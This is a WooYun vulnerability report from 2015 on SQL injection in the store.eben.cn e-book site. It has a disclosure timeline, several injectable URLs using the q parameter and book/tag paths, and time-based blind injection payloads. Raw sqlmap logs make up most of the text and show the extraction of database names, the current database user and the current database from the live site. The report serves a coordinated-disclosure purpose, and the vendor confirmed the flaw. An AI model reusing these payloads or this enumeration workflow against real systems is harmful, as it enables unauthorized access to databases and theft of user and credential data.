WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-07-06: Details sent to the vendor; awaiting the vendor's handling
2015-07-07: Vendor has confirmed; details disclosed to the vendor only
2015-07-17: Details disclosed to core white hats and experts in the relevant field
2015-07-27: Details disclosed to ordinary white hats
2015-08-06: Details disclosed to intern white hats
2015-08-21: Details disclosed to the public
Heaven and earth are not benevolent; they treat all things as straw dogs. [HD] In the name of the team, for personal honour, building network security together.
http://store.eben.cn:80/book/tag/500-1'%20OR%203*2*1%3d6%20AND%20000156%3d000156%20--%20
Took a look at the privileges.
Also, I want to say: how is it that the q parameter is injectable wherever it appears... In the previous report I only listed 4 places, but there are more than 4; they are all q-parameter injections, and here are more...
http://store.eben.cn:80/precinct/84?q=-1
http://store.eben.cn:80/magazine/search/?q=-1
http://store.eben.cn:80/precinct/1?q=-1
http://store.eben.cn:80/precinct/85?q=-1
http://store.eben.cn:80/precinct/86?q=-1
http://store.eben.cn:80/precinct/87?q=-1
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 106 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://store.eben.cn:80/precinct/84?q=-1' OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))IopG)-- XyPQ21=6 AND 000633=000633 or 'N75PGnje'='
---
[14:19:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[14:19:11] [INFO] fetching database names
[14:19:11] [INFO] fetching number of databases
[14:19:11] [INFO] retrieved:
[14:19:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y
1
[14:19:39] [INFO] adjusting time delay to 2 seconds due to good response times
5
[14:19:41] [INFO] retrieved: information_schema
[14:23:03] [INFO] retrieved: admin
[14:23:58] [INFO] retrieved: cann
[14:24:47] [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large')
[14:24:47] [WARNING] turning off page compression
[14:24:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[14:24:52] [ERROR] invalid character detected. retrying..
[14:24:52] [WARNING] increasing time delay to 3 seconds
a
[14:25:04] [INFO] retrieved: cms
[14:25:50] [INFO] retrieved: count
[14:27:16] [INFO] retrieved: discuz
[14:28:51] [INFO] retrieved: dz
[14:29:28] [INFO] retrieved: eben_store
[14:32:05] [INFO] retrieved: ebencms
[14:33:46] [INFO] retrieved: ecshop
[14:35:28] [INFO] retrieved: gateway
[14:37:11] [INFO] retrieved: oauth_db
[14:39:19] [INFO] retrieved: passport
[14:41:38] [INFO] retrieved: ucenter
[14:43:28] [INFO] retrieved: uchome
available databases [15]:
[*] `count`
[*] admin
[*] canna
[*] cms
[*] discuz
[*] dz
[*] eben_store
[*] ebencms
[*] ecshop
[*] gateway
[*] information_schema
[*] oauth_db
[*] passport
[*] ucenter
[*] uchome
[14:45:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[14:45:03] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\store.eben.cn'
[*] shutting down at 14:45:03
The rest you can check for yourselves.
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 107 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://store.eben.cn:80/book/tag/500-1' OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ebnB)-- BUhJ21=6 AND 000156=000156 --
---
[14:19:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[14:19:08] [INFO] fetching database names
[14:19:08] [INFO] fetching number of databases
[14:19:08] [INFO] retrieved:
[14:19:08] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[14:19:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:19:08] [ERROR] unable to retrieve the number of databases
[14:19:08] [INFO] falling back to current database
[14:19:08] [INFO] fetching current database
[14:19:08] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y
[14:19:46] [INFO] adjusting time delay to 4 seconds due to good response times
eben_store
available databases [1]:
[*] eben_store
[14:25:58] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 19 times
[14:25:58] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\store.eben.cn'
[*] shutting down at 14:25:58

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://store.eben.cn:80/book/tag/500-1' OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ebnB)-- BUhJ21=6 AND 000156=000156 --
---
[14:26:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[14:26:34] [INFO] fetching current user
[14:26:34] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y
[14:27:12] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[14:27:35] [INFO] adjusting time delay to 3 seconds due to good response times
[email protected]/255.255.255.0
current user: '[email protected]/255.255.255.0'
[14:45:30] [INFO] fetching current database
[14:45:30] [INFO] resumed: eben_store
current database: 'eben_store'
[14:45:30] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\store.eben.cn'
[*] shutting down at 14:45:30
Is there a gift?
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-07-07 13:44
We will continue to work on raising our security level.
None yet